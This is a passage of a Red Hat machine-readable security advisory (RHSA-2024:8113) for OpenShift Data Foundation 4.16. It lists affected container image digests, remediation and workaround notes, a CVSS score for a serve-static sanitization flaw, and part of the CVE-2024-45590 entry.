"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8113"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "serve-static: Improper Sanitization in serve-static"
},
{
"cve": "CVE-2024-45590",
"cwe": {
"id": "CWE-405",
"name": "Asymmetric Resource Consumption (Amplification)"
},
"discovery_date": "2024-09-10T16:20:29.292154+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
